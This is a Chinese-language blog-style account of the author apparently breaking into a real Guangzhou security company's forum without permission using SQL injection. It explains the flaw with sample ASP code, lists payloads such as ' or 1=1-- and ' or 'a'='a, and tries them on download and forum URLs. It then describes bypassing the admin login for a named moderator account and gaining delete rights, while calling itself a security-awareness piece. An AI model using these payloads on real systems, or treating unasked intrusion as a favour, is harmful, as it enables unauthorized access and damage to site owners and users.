前言:寫這篇文章不是為了告訴大家如何去做入侵，而是希望提醒大家:“入侵是偶然的，但安全並不是必然的”，不要疏忽運作上的一些小細節。
筆者一直都有經常性地到一些安全方面的網站瞎逛的習慣的，最近因為一次機緣巧合之下通過連結來到廣州某個頗有名氣的網路安全公司的網站。說實在的，這個網站好象挺多元化的，提供軟體下載之餘，還有自己的論壇(嘿嘿，介面做得還真不賴嘛，不知道安全性如何呢？)。出於對其安全操守的好奇，小神決定義務為其做個的初步的“安全滲透測試”。開始時只是拿一些綜合性的網路漏洞掃描工具(X-scan3.0、Nmap、Retina等等)進行資訊掃描，然後做個結果篩選，結果只查到對方開了TCP80埠(也就是說他們的伺服器只提供了正常的HTTP服務)，且無任何典型的漏洞....沒戲了，對方畢竟還是一間有些知名度的企業嘛(因為這篇文章的重點並不在此，所以用網路漏洞掃描器作資訊掃描這個步驟我就不在這裡多作說明了)。就這樣放棄了嗎？沒那麼容易...恰好小神最近在整理SQL Injection(SQL注入攻擊)方面的資料，既然現在有機會就再“勉為其難”地幫它測試一下吧:P
------------------------------------------------------------------------------------------
提示:
問:什麼是SQL注入？
答:這種攻擊的要訣在於將SQL的查詢/行為命令通過‘嵌入’的方式放入合法的HTTP提交請求中從而達到攻擊者的某種意圖。現在很多的動態網頁都會從該網頁使用者的請求中得到某些引數，然後動態的構成SQL請求發給資料庫的。舉個例子，當有某個使用者需要通過網頁上的使用者登陸(使用者身份驗證)時，動態網頁會將該使用者提交上來的使用者名稱與密碼加進SQL詢問請求發給資料庫，用於確認該使用者提交的身份驗證資訊是否有效。在SQL注入攻擊的角度看來，這樣可以使我們在傳送SQL請求時通過修改使用者名稱與/或密碼值的‘領域’區來達到攻擊的目的。

SQL注入技術的更多相關資訊請看:
http://demonalex.nease.net/sql_injection/walkthrough.txt
------------------------------------------------------------------------------------------
首先是下載系統，隨便抽一個工具的下載地址:
http://該安全公司的網址/某目錄/download/open.asp?id=3444
------------------------------------------------------------------------------------------
附錄:這裡筆者用中文代替了某些敏感資訊，還請各位見諒哦。
------------------------------------------------------------------------------------------
http://該安全公司的網址/某目錄/download/open.asp?id=3444'
先測試一下對方有沒有過濾'(單引號)...

示:
問:如何確認一個網站有SQL注入缺陷呢？
答:首先先加入某些特殊的字元標記，輸入如:
hi' or 1=1--
尋找一些登陸頁面，在其登陸ID與密碼輸入處，或URL中輸入:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.htm?id=hi' or 1=1--
如果想以‘隱藏’的方式進行此類測試，你可以把該HTML網頁從網站上下載至本地硬碟，修改其隱藏部分的值，如:
〈FORM action=http://duck/Search/search.asp method=post〉
〈input type=hidden name=A value="hi' or 1=1--"〉
〈/FORM〉
如果閣下是幸運的話估計現在已經可以不需要帳號與密碼而‘成功登陸’了。
------------------------------------------------------------------------------------------
再試試下面的url，看看能否返回正常的頁面...
http://該安全公司的網址/某目錄/download/open.asp?id=3444"
http://該安全公司的網址/某目錄/download/open.asp?id=3444' or 1=1--
http://該安全公司的網址/某目錄/download/open.asp?id=3444" or 1=1--
http://該安全公司的網址/某目錄/download/open.asp?id=3444' or 'a'='a
http://該安全公司的網址/某目錄/download/open.asp?id=3444" or "a"="a
------------------------------------------------------------------------------------------
提示:
問:為什麼要特意使用' or 1=1--來做測試呢？
答:讓我們來看看其他例子中使用'or 1=1--的重要性吧。有別於正常的登陸方式，使用這樣的登陸方式可能可以得到正常登陸中不能得到的某些特殊資訊。用一個連結中得到的ASP頁來打比方:
http://duck/index.htm?category=food
在上面這條URL中，'category'是一個變數名，而'food'是賦予該變數的值。為了做到這些(連結成功)，這個ASP必須包含以下相關的程式碼(下面也是我們為了演示這個實驗所寫的程式碼):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
正如我們所看到的，變數值將會預先處理然後賦值於'v_cat'，也就是說該SQL語句將會變為:
SELECT * FROM product WHERE PCategory='food'
這個請求將會返回通過WHERE條件比較後得到的結果，在這個例子中也就是'food'了。現在設想一下如果我們把該URL改成這樣的話:
http://duck/index.htm?category=food' or 1=1--
現在我們的變數v_cat的值就等同於"food' or 1=1--"了，現在如果我們要重新代入那條SQL請求的話，那條SQL請求將會是:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
現在這個請求將會從product表中選取每一條資訊而並不會去理會PCategory是否等於'food'。至於結尾部分的那兩條'--'(破折號)則用於‘告訴’MS SQL SERVER忽略結尾最後的那個'(單引號)。有的時候也可以使用'#'(井號)來代替'--'(雙破折號)在這裡的用法。無論如何，如果對方不是一臺SQL伺服器(這裡指的是MS SQL SERVER)，或者你不能使用簡單的方法去忽略最後的那個單引號的話，你可以嘗試:
' or 'a'='a
這樣的話整個SQL請求將會變為:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
它也會返回相同的結果。
根據實際情況，SQL注入請求是可以有多種動態變化的可能性的:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
------------------------------------------------------------------------------------------
都是返回“HTTP 500 - 內部伺服器錯誤”，看來是又失敗了，不怕，我們還有希望...此時的希望只能全部寄託在論壇上了...

循序漸進，首先找來一條帖子的url(這一步筆者挑了:http://該安全公司的網址/論壇目錄/list.asp?ltid=14這條URL)重複剛剛的行為:
http://該安全公司的網址/論壇目錄/list.asp?ltid=14'
http://該安全公司的網址/論壇目錄/list.asp?ltid=14"
http://該安全公司的網址/論壇目錄/list.asp?ltid=14' or 1=1--
http://該安全公司的網址/論壇目錄/list.asp?ltid=14" or 1=1--
http://該安全公司的網址/論壇目錄/list.asp?ltid=14' or 'a'='a
http://該安全公司的網址/論壇目錄/list.asp?ltid=14" or "a"="a
不過看來還是在吃白果...(如下圖所示)

除了位址列，不要忘了還有論壇首頁的登陸框:

在“使用者名稱：”區域中輸入:
網***' or 1=1--
然後在“密碼：”區域中隨便輸入幾個密碼看看吧:P
------------------------------------------------------------------------------------------
附錄:“網***”為我們在論壇首頁中看到的那個版主帳號。
------------------------------------------------------------------------------------------

還是不行，試試在密碼區域進行注入攻擊吧...具體操作:
在“使用者名稱：”中輸入:
“網***”
然後在“密碼：”中輸入:
' or 1=1--
(提交後得到下圖)

fail...再用:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
切換了幾次，還是不行，看來真的是“堅不可摧”了...
“風繼續吹，不忍遠離...”小神的MP3裡哼著‘哥哥’張國榮的歌，難道就這樣離開嗎？到論壇的首
頁裡再逛一圈吧....一掃眼，還真道靈光，注意一下論壇登陸區域上方的小連結，看到了吧？第三條
連結是什麼呢？

單擊後跳出如下圖所示的登陸視窗:

首先在“論壇：”這一攔選中相應的版面(這裡筆者挑了第一個版面“安全工具”)，然後再重新嘗試一下:
帳號: 網***' or 1=1--
密碼: 任意密碼

不行，再試試:
帳號: 網***
密碼: ' or 1=1--
......
......
小神的手顫了一下，只因“有顏色的介面”出來了:

開始時以為是假象，連忙點選“進入後臺>>>”...

這次看來是真的了，點選其中一條帖子再測試一下:

(看到了吧？有“刪除”按鈕了也...其實我們可以做的還不只這些...PS:小神可是個好孩子哦^_^)
寫到這裡，也算是有個交代了吧？！^@@^
整篇文章的主旨也不過就是介紹瞭如何簡單地利用SQL注入攻擊滲透論壇吧，其實現在再談SQL注
入也是老生常談了，但想不到連知名的網路安全公司也有這樣的漏洞，歸根結底就是人們對安全意識
的不重視而引起的，這篇文章告訴了我們:不要忽視運作中的一些小細節。